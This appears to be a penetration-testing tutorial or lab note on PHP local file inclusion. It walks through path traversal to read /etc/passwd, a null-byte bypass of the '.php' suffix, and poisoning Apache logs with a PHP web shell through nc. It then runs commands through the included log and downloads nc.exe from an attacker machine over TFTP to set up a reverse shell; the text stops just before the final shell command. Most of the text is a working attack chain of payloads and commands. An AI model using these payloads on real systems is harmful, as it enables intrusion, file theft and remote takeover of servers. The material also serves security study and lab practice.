Can try path traversal after having successfully uploaded a file to webapp, by attempting to browse to root folder, in Linux:
fileshare.com/files.php?file=../../../../../../etc/passwd
Ability to "include" any local file in the filesystem and execute PHP code within the included files.
Vulnerability:
if (isset( $_GET['LANG'] ) ) { $lang = $_GET['LANG'];}
else { $lang = 'en';}
include( $lang . '.php' );
With this, you can access files that are on the system by changing the value of the LANG attribute and using directory path traversal. But notice in the vulnerable code, it appends .php to the end, to bypass that in PHP versions below 5.3, use a null byte (%00):
LANG=../../../../../../../../windows/system32/drivers/etc/hosts%00
If we could get PHP code written to somewhere on the server filesystem, we can get a shell. Assuming, we can't directly upload a file to the remote filesystem, we can contaminate log files to include PHP code:
$ nc 192.168.1.23 80
<?php echo shell_exec($_GET['cmd']);?>
HTTP/1.1 400 Bad Request
This connection results in the following text written to the Apache log files located in C:\\xampp\\apache\\logs\\access.log, effectively introducing PHP code into a file on the local filesystem of the webserver:
192.168.1.23 - - [17/Apr/2013:06:22:00 -0400] " <?php echo shell_exec($_GET['cmd']);?>" 400 1047
Let's try including that log file and executing the malicious PHP code stored within it, by putting the pathname into the LANG attribute, and putting ipconfig in the cmd attribute:
<http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00>
The result may be a little hard to see, as the entire log file will be dumped along with the command's output.
Let's get a shell now by transferring over "nc.exe" to the webserver using the TFTP technique. First, start the TFTP server on the attacker machine with atftpd --daemon --port 69 /tftp and copying "nc.exe" over to the hosting directory with cp /usr/share/windows-binaries/nc.exe /tftp. Now execute the tftp on the webserver using LFI. Remember to URL encode the command string within the "cmd" attribute:
<http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=tftp+-i+>[kali ip]+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00
The webpage will start to hang for a while, as it awaits the output from the tftp command that is downloading "nc.exe". Once done, execute the downloaded "nc.exe" and create a reverse shell: